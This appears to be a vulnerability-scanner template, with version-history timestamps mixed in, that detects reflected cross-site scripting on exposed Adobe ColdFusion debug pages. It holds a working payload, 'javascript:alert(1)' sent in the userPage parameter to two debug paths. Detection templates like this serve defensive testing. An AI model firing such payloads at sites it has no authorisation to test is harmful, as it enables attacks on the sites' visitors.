2021-07-01 17:01:01 +00:00
id : coldfusion-debug-xss
info :
name : Adobe ColdFusion Debug Page XSS
author : dhiyaneshDK
severity : medium
2021-08-02 11:30:22 +00:00
description : The remote Adobe ColdFusion debug page has been left open to unauthenticated users, this could allow remote attackers to trigger a reflected cross site scripting against the visitors of the site.
2021-07-02 15:25:33 +00:00
reference : https://github.com/jaeles-project/jaeles-signatures/blob/master/common/coldfusion-debug-xss.yaml
2021-07-22 23:44:57 +00:00
tags : adobe,coldfusion,xss
2021-07-01 17:01:01 +00:00
requests :
- method : GET
path :
- '{{BaseURL}}/CFIDE/debug/cf_debugFr.cfm?userPage=javascript:alert(1)'
- '{{BaseURL}}/cfusion/debug/cf_debugFr.cfm?userPage=javascript:alert(1)'
2021-07-03 19:52:08 +00:00
2021-07-01 17:01:01 +00:00
matchers-condition : and
matchers :
- type : word
part : body
words :
- '"cf_main_cf" src="javascript:alert(1)"'
2021-07-03 19:52:08 +00:00
2021-07-01 17:01:01 +00:00
- type : word
part : header
words :
- "text/html"
- type : status
status :
- 200